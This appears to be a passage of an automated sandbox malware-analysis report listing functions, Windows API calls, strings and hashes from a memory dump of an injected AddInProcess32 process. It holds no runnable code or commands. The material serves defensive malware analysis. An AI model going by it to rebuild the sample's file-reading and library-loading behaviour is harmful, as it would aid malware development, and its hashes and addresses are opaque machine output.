                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                      • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: /stext
                                                      • API String ID: 2081463915-3817206916
                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                      APIs
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2445788494-0
                                                      • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                      • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 3150196962-0
                                                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                      APIs
                                                      Strings
                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: malloc
                                                      • String ID: failed to allocate %u bytes of memory
                                                      • API String ID: 2803490479-1168259600
                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                      APIs
                                                      • memset.MSVCRT ref: 0041BDDF
                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memcmpmemset
                                                      • String ID:
                                                      • API String ID: 1065087418-0
                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                      APIs
                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                      • CloseHandle.KERNELBASE(?), ref: 00410654
                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                      • String ID:
                                                      • API String ID: 1381354015-0
                                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                      • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                      APIs
                                                      • memset.MSVCRT ref: 004301AD
                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID:
                                                      • API String ID: 1297977491-0
                                                      • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                      • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                      APIs
                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                      • String ID:
                                                      • API String ID: 2154303073-0
                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                      APIs
                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 3150196962-0
                                                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: File$PointerRead
                                                      • String ID:
                                                      • API String ID: 3154509469-0
                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                      APIs
                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                      • String ID:
                                                      • API String ID: 4232544981-0
                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                      APIs
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$FileModuleName
                                                      • String ID:
                                                      • API String ID: 3859505661-0
                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                      APIs
                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                      APIs
                                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: EnumNamesResource
                                                      • String ID:
                                                      • API String ID: 3334572018-0
                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                      APIs
                                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                      APIs
                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                      Memory Dump Source
                                                      • Source File: 0000001B.00000002.2389206550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_27_2_400000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: CloseFind
                                                      • String ID:
                                                      • API String ID: 1863332320-0
                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                      APIs
